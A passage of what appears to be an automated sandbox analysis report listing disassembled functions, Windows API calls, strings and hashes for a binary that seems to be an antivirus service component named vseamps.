                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$CriticalSection$EnterFreeProcess$Leave
                                                                          • String ID: H
                                                                          • API String ID: 2107338056-2852464175
                                                                          • Opcode ID: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                                                          • Instruction ID: c1f1c0cc251b461ea163c40135a27997c94af954a8846501eddf5ed74a01cb36
                                                                          • Opcode Fuzzy Hash: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                                                          • Instruction Fuzzy Hash: D5513B76216B4086EBA2DF63B84439A73E5F74DBD0F098128EB9D87765EF39C4558300
                                                                          Function 0000000140003200 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 100timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$AddressEnterLeaveProc$LibraryLoadTimerWaitable
                                                                          • String ID: fnCallback: hScan=%d, evId=%d, context=%p$fnCallback: hScan=%d, putting event %d into listening threads queues$fnCallback: hScan=%d, quarantine, result %d
                                                                          • API String ID: 1322048431-2685357988
                                                                          • Opcode ID: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                                                          • Instruction ID: ba1df9fb3c509f4e652456910b8147ac8aac6905a945631cefe2604201aedb7e
                                                                          • Opcode Fuzzy Hash: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                                                          • Instruction Fuzzy Hash: 645106B5214B4181EB13CF16F880BD923A4E79DBE4F445622BB594B6B4DF3AC584C740
                                                                          Function 0000000140003D50 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 75timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeaveTimerWaitable
                                                                          • String ID: doCleanup: enter, cAmpEntry %p$doCleanup: pid %d, marking the cAmpEntry pointer for deletion$doCleanup: pid %d, removing cAmpEntry, index is %d
                                                                          • API String ID: 2984211723-3002863673
                                                                          • Opcode ID: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                                                          • Instruction ID: 6ce834a9fa2c46ab9e722fc1bcf1c858386cde021ca473021475461b430fce50
                                                                          • Opcode Fuzzy Hash: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                                                          • Instruction Fuzzy Hash: 9B4101B5214A8591EB128F07F880B9863A4F78CBE4F495226FB1D0BBB4DB7AC591C710
                                                                          Function 00000001400021A0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 65COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandleMultipleObjectsOpenProcessWait
                                                                          • String ID: doMonitor: end process id=%d, result from WaitForMultipleObjects=%d$doMonitor: monitoring process id=%d$fnMonitor: monitor thread for ctx %p
                                                                          • API String ID: 678758403-4129911376
                                                                          • Opcode ID: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                                                          • Instruction ID: f397f01a700ed75a1720fb106c04e764a2ecaef09c032a262f7e58a7780e1373
                                                                          • Opcode Fuzzy Hash: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                                                          • Instruction Fuzzy Hash: B63107B6610A4582EB12DF57F84079963A4E78CBE4F498122FB1C0B7B4DF3AC585C710
                                                                          Function 0000000140001750 Relevance: 15.1, APIs: 12, Instructions: 133memorystringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocProcesslstrlen
                                                                          • String ID:
                                                                          • API String ID: 3424473247-0
                                                                          • Opcode ID: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                                                          • Instruction ID: a11592c0991bfac199573d0d609f53e0c1426f0a5ad78f28403dae96cf8670eb
                                                                          • Opcode Fuzzy Hash: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                                                          • Instruction Fuzzy Hash: C8513AB6701640CAE666DFA3B84479A67E0F74DFC8F588428AF4E4B721DA38D155A700
                                                                          Function 0000000140004750 Relevance: 13.6, APIs: 9, Instructions: 80sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterEventLeaveMultipleObjectsWait$ResetSleep
                                                                          • String ID:
                                                                          • API String ID: 2707001247-0
                                                                          • Opcode ID: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                                                          • Instruction ID: f9d573460b216e7eeefce72b36cf093424a31f8579033a03516ac6dab9ef0102
                                                                          • Opcode Fuzzy Hash: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                                                          • Instruction Fuzzy Hash: BC3159B6304A4492EB22DF22F44479AB360F749BE4F444121EB9E07AB4DF39D489C708
                                                                          Function 0000000140001690 Relevance: 12.5, APIs: 10, Instructions: 38memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$FreeProcess
                                                                          • String ID:
                                                                          • API String ID: 3859560861-0
                                                                          • Opcode ID: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                                                          • Instruction ID: 4159c8d252e8bf7a629169213e0784b10943506046d671ff930a732f0a48acbb
                                                                          • Opcode Fuzzy Hash: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                                                          • Instruction Fuzzy Hash: EC1145B4915A4081F70BDF97B8187D522E2FB8DBD9F484025E70A4B2B0DF7E8499C601
                                                                          Function 0000000140013710 Relevance: 12.5, APIs: 10, Instructions: 38memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$FreeProcess
                                                                          • String ID:
                                                                          • API String ID: 3859560861-0
                                                                          • Opcode ID: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                                                          • Instruction ID: 56b7ada565ecb083b5892330f511bf6cd885877ef2bee609f5ffef12e4ab2997
                                                                          • Opcode Fuzzy Hash: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                                                          • Instruction Fuzzy Hash: E01172B4918A8081F71BDBA7B81C7D522E2FB8DBD9F444015E70A4B2F0DFBE8499C601
                                                                          Function 00007FFAADBEB86C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318305230.00007FFAADBE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFAADBE0000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318275672.00007FFAADBE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318347820.00007FFAADBF2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318385065.00007FFAADBFD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318420036.00007FFAADBFF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffaadbe0000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeLibraryProc
                                                                          • String ID: api-ms-$ext-ms-
                                                                          • API String ID: 3013587201-537541572
                                                                          • Opcode ID: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                                                          • Instruction ID: 318f418d6c58139a967b76ef18b5362e61a5194ef5e67a0f7571ce987d1e2ed6
                                                                          • Opcode Fuzzy Hash: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                                                          • Instruction Fuzzy Hash: 6941C725B1BB02C1EA158B26E8546B92391FF4AB90F15C539DDAE87794FF3CE409C384
                                                                          Function 0000000140002A00 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$CloseCreateEnterLeaveQueryValue
                                                                          • String ID: SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                                                          • API String ID: 1119674940-1966266597
                                                                          • Opcode ID: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                                                          • Instruction ID: f124d29d71956a548941c3df06686b2c3eef24402cfc23b06ee64cf3511db711
                                                                          • Opcode Fuzzy Hash: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                                                          • Instruction Fuzzy Hash: 6F31F975214B4186EB22CF26F884B9573A4F78D7A8F401315FBA94B6B4DF3AC148CB00
                                                                          Function 0000000140001900 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 56memorystringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocProcesslstrlen$ComputerName
                                                                          • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                                                          • API String ID: 3702919091-996641649
                                                                          • Opcode ID: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                                                          • Instruction ID: 080136972d91dcf489914e021d1613250a4fb989530f4420e20b1ceb3111c88a
                                                                          • Opcode Fuzzy Hash: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                                                          • Instruction Fuzzy Hash: 4F212A71215B8082EB12CB12F84438A73A4F789BE8F514216EB9D07BB8DF7DC54ACB00
                                                                          Function 000000014000F3E0 Relevance: 10.7, APIs: 7, Instructions: 179COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F43A
                                                                          • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F459
                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F4FF
                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F559
                                                                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F592
                                                                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F5CF
                                                                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F60E
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide$Info
                                                                          • String ID:
                                                                          • API String ID: 1775632426-0
                                                                          • Opcode ID: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                                                          • Instruction ID: 43b9ce706039119b05782f2693b3e997f7dca892eef84fff4304595f3d56aff3
                                                                          • Opcode Fuzzy Hash: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                                                          • Instruction Fuzzy Hash: 266181B2200B808AE762DF23B8407AA66E5F74C7E8F548325BF6947BF4DB74C555A700
                                                                          Function 00007FFAADBE712C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FFAADBE72EB,?,?,?,00007FFAADBE3EC0,?,?,?,?,00007FFAADBE3CFD), ref: 00007FFAADBE71B1
                                                                          • GetLastError.KERNEL32(?,?,?,00007FFAADBE72EB,?,?,?,00007FFAADBE3EC0,?,?,?,?,00007FFAADBE3CFD), ref: 00007FFAADBE71BF
                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FFAADBE72EB,?,?,?,00007FFAADBE3EC0,?,?,?,?,00007FFAADBE3CFD), ref: 00007FFAADBE71E9
                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FFAADBE72EB,?,?,?,00007FFAADBE3EC0,?,?,?,?,00007FFAADBE3CFD), ref: 00007FFAADBE7257
                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FFAADBE72EB,?,?,?,00007FFAADBE3EC0,?,?,?,?,00007FFAADBE3CFD), ref: 00007FFAADBE7263
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318305230.00007FFAADBE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFAADBE0000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318275672.00007FFAADBE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318347820.00007FFAADBF2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318385065.00007FFAADBFD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318420036.00007FFAADBFF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffaadbe0000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                          • String ID: api-ms-
                                                                          • API String ID: 2559590344-2084034818
                                                                          • Opcode ID: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                                                          • Instruction ID: 0fee88aa73816a6ee50a800c441f2c2c143436e0cc85ca5465985a93f21da148
                                                                          • Opcode Fuzzy Hash: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                                                          • Instruction Fuzzy Hash: 7B31B421A1B742D1EE169B52E8006B96394FF4BB60F598535EDBD8B390FF3CE4498380
                                                                          Function 00007FFAADBE9444 Relevance: 10.6, APIs: 7, Instructions: 62COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318305230.00007FFAADBE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFAADBE0000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318275672.00007FFAADBE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318347820.00007FFAADBF2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318385065.00007FFAADBFD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318420036.00007FFAADBFF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffaadbe0000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 2506987500-0
                                                                          • Opcode ID: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                                                          • Instruction ID: 2ec63e6a0ee560c10883617117500432db1f64a7f99ac124593794b37a2a08a9
                                                                          • Opcode Fuzzy Hash: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                                                          • Instruction Fuzzy Hash: 73217C24E0E642C9FE64A331D5551795262DF4ABB0F00C734E9BE47AC6FF2CE44D8280
                                                                          Function 00007FFAADBF0100 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318305230.00007FFAADBE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFAADBE0000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318275672.00007FFAADBE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318347820.00007FFAADBF2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318385065.00007FFAADBFD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318420036.00007FFAADBFF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffaadbe0000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                          • String ID: CONOUT$
                                                                          • API String ID: 3230265001-3130406586
                                                                          • Opcode ID: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                                                          • Instruction ID: fbb639f58eced340f50f50f0664d3f3f800c9442c57cd478e3e3cd96788d01a4
                                                                          • Opcode Fuzzy Hash: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                                                          • Instruction Fuzzy Hash: F1115722A19B41C6E7508B52E84472576A0FB8DFE4F048234EAADC7794EF7CD558C784
                                                                          Function 0000000140001270 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41registrysynchronizationCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegisterServiceCtrlHandlerW.ADVAPI32 ref: 0000000140001282
                                                                          • CreateEventW.KERNEL32 ref: 00000001400012C0
                                                                            • Part of subcall function 0000000140003F80: InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
                                                                            • Part of subcall function 0000000140003F80: GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
                                                                            • Part of subcall function 0000000140003F80: OpenProcessToken.ADVAPI32 ref: 0000000140004007
                                                                            • Part of subcall function 0000000140003F80: GetLastError.KERNEL32 ref: 0000000140004011
                                                                            • Part of subcall function 0000000140003F80: EnterCriticalSection.KERNEL32 ref: 00000001400040B3
                                                                            • Part of subcall function 0000000140003F80: LeaveCriticalSection.KERNEL32 ref: 000000014000412B
                                                                            • Part of subcall function 0000000140003F80: GetVersionExW.KERNEL32 ref: 0000000140004155
                                                                            • Part of subcall function 0000000140003F80: RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
                                                                            • Part of subcall function 0000000140003F80: RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
                                                                            • Part of subcall function 0000000140003F80: RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
                                                                            • Part of subcall function 0000000140003F80: RpcServerListen.RPCRT4 ref: 00000001400041D3
                                                                          • SetServiceStatus.ADVAPI32 ref: 0000000140001302
                                                                          • WaitForSingleObject.KERNEL32 ref: 0000000140001312
                                                                            • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
                                                                            • Part of subcall function 00000001400042B0: CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
                                                                            • Part of subcall function 00000001400042B0: SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
                                                                            • Part of subcall function 00000001400042B0: WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
                                                                            • Part of subcall function 00000001400042B0: TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
                                                                            • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
                                                                            • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
                                                                            • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
                                                                            • Part of subcall function 00000001400042B0: RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
                                                                            • Part of subcall function 00000001400042B0: RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
                                                                            • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
                                                                            • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
                                                                            • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
                                                                            • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
                                                                            • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
                                                                            • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
                                                                            • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6
                                                                          • SetServiceStatus.ADVAPI32 ref: 000000014000134B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$Server$CloseEnterHandleLeaveService$DeleteEventObjectProcessRegisterSingleStatusWait$CancelContextCreateCtrlCurrentDontErrorHandlerInitializeLastListenListeningMgmtOpenProtseqSerializeStopTerminateThreadTimerTokenUnregisterVersionWaitable
                                                                          • String ID: vseamps
